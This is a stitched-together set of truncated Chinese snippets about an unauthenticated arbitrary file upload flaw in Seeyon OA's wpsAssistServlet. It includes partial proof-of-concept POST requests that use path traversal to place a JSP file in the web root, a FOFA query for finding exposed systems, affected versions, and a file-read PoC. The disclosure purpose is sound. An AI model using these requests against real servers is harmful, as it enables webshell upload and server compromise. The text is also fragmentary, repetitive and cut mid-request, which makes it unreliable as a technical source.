03 利用方式 1、调用文件上传接口上传测试文件,请求包如下: POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/test.jsp&fileId=2HTTP/1.1Host:127.0.0.1Content-Length:349Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b Accept-...
Wps任意文件上传 这里我们可以发现这个servlet,进入CTPSecurityFilter过滤器,且不在ServletAuthenticator的servlets列表中,也就是会进入默认的认证器defaultAuthenticator。那么就是没有鉴权的操作。 进入WPSOfficeServlet查看代码,这里会从请求中获取名为 flag 的参数,这个参数表示后续要执行的操作类型。 这里可以发现当,flag为...
1、调用文件上传接口上传测试文件,请求包如下: POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/test.jsp&fileId=2 HTTP/1.1Host:127.0.0.1Content-Length:349Content-Type:multipart/form-data;boundary=59229605f98b8cf290a7b8908b34616bAccept-Encoding:gzip --...
漏洞复现 fofa语法:app="致远互联-OA" && title="V8.0SP2" 登录页面如下: C://Seeyon/A6/base/temporary为默认上传的位置,但realFileType, fileId参数可控,可以通过 ../ 遍历上传到任意目录下,验证POC POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debug...
致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。 漏洞影响 致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)致远OA G6、G6N (V8.1、V8.1SP1) 网络测绘 app=“致远互联-OA” && title=“V8.0SP2” 漏洞复现 poc POST /seeyon/wpsAssistServlet...
漏洞描述: 北京致远互联软件股份有限公司成立于2002年,总部设立在北京,是一家始终专注于协同管理软件领域的高新技术企业,为客户提供专业的协同管理软件产品、解决方案、平台及云服务,是中国协同管理软件领域的开创者。旗下致远OA/seeyon/wpsAssistServlet存在任意文件上传。
wpsAssistServlet 任意文件上传 漏洞描述 代码语言:javascript 复制 致远OAwpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限 漏洞影响 致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致远OA G6、G6N (V8.1、V8.1SP1) ...
致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现 01 漏洞描述 致远OA是一套办公协同管理软件。致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。 02 影响范围 致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致远OA G6、G6N (V8.1、V8.1SP1)...
然而,近期发现致远OA存在一个严重的安全漏洞——WPSassistServlet任意文件上传漏洞,这可能对企业的信息安全构成严重威胁。 首先,我们来深入理解一下这个漏洞的关键部分——“WPSassistServlet任意文件上传”。在技术层面,“WPSassistServlet”是致远OA系统中的一个组件,用于处理WPS文件的上传和转换。而“任意文件上传”则...
## 致远OA wpsAssistServlet任意文件读取漏洞 ## POC ``` POST /seeyon/wpsAssistServlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Connection: Keep-Alive Content-Length: 47 Content-Type: application/x-www-form-urlencoded flag=template...